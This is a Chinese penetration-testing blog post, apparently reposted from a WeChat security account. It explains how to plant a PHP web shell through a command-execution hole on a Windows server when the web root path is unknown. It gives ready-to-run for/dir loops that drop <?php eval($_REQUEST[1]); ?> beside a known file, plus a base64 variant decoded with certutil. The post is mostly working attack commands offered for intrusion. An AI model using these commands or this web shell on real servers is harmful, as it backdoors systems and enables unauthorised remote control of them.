命令执行无路径写shell

渗透技巧 2年前 (2021) admin
1,083 0 0


命令执行无路径写shell

看到一个比较有意思的姿势,分享给大家

命令执行无路径写shell


0x01 前言

      在实战中我们可能挖到了一个命令执行但是因为找不到目录而无法写shell,那么这种情况本篇文章就可以派上用场了

        简单来说就是:查找系统的某个文件并在那个文件的同级目录下写入我们的新文件


0x02 命令

[规定查找的盘符] 例如: c盘, d盘, e盘, f盘[查找的文件] 例如:index.php[写入的内容] 例如:<?php eval($_REQUEST[1]); ?>[写入的文件名字] 例如:xx.php
命令:for /f %i in ('dir /s /b [规定查找的盘符]:[查找的文件]') do (echo "[写入的内容]" > %i..[写入的文件名字])
命令实例化:for /f %i in ('dir /s /b c:index.php'do (echo "<?php eval($_REQUEST[1]); ?>" > %i..xx.php)     


0x03 举例

场景:

现在我们有一个命令执行漏洞,但是找不到站点的目录无法写shell,于是就想批量查找某个文件并在这个文件下写入我们自己的文件


查看站点发现了一张图片 http://x.x.x.x/upload/icon.jpg

但是无法得知路径,这种情况下就可以使用下面的命令批量查找写入了


0x03.1 例子一  普通写入

查找c盘下面所有叫 1.jpg 的文件并且在同级目录写入一个文件 test.txt 文件内容为 123
命令:for /f %i in ('dir /s /b c:1.jpg') do (echo "123" > %i..test.txt)

执行完毕以后,c盘所有叫 1.jpg 的文件同级目录就都会写入一个 test.txt 文件了

接着我们访问 http://x.x.x.x/upload/test.txt

就可以看到站点写入了一个 test.txt 文件

内容为: 123


0x03.2 例子二 – base64写shell


 第一步 先查找c盘上所有叫 1.jpg 的文件,然后把base64编码内容写入到 base64.txt 文件里面
[规定查找的盘符] 例如: c盘, d盘, e盘, f盘[查找的文件] 例如:1.jpg[写入的文件名字] 例如:1.php
命令:for /f %i in ('dir /s /b [规定查找的盘符]:[查找的文件]') do (echo [base64编码的内容] > %i..[写入的文件名字])
实例执行命令:写base64文件到规定的路径下:for /f %i in ('dir /s /b c:1.jpg'do (echo PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOyA/Pgo= > %i..base64.txt)  
 第二步 在找到第一步写入的文件,进行base64解码以后进行二次写马
[规定查找的盘符] 例如: c盘, d盘, e盘, f盘[查找的文件] 例如:base64-hm-test.txt[要解码的文件名字] 例如:base64-hm-test.txt[写入的文件名字] 例如:1.php
命令:for /f %i in ('dir /s /b [规定查找的盘符]:[查找的文件]') do (certutil.exe -decode %i..[要解码的文件名字] %i..[写入的文件名字])
实例执行命令:for /f %i in ('dir /s /b c:base64.txt'do (certutil.exe -decode %i..base64.txt %i..1.php)    

执行完毕以后,c盘所有叫 1.jpg 的文件同级目录就都会写入一个 1.php 文件了


接着我们访问 http://x.x.x.x/upload/1.php

就可以看到站点写入了一个 1.php 文件

内容为: <?php eval($_REQUEST[1]); ?>


                                                                                                      –来自P喵的思路

命令执行无路径写shell






往期精彩:

【审计学习】PHP审计的危险函数概括

【超详细 | 附EXP】Weblogic 新的RCE漏洞CVE-2021-2394

【入侵检测】Linux机器中马排查思路

【入侵检测】Windows机器中马排查思路

【代码审计】对一套钓鱼网站的代码审计

  Web安全——登录页面渗透测试思路整理


命令执行无路径写shell

点个在看你最好看


命令执行无路径写shell

原文始发于微信公众号(Qingy之安全):命令执行无路径写shell

版权声明:admin 发表于 2021年11月28日 上午11:28。
转载请注明:命令执行无路径写shell | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...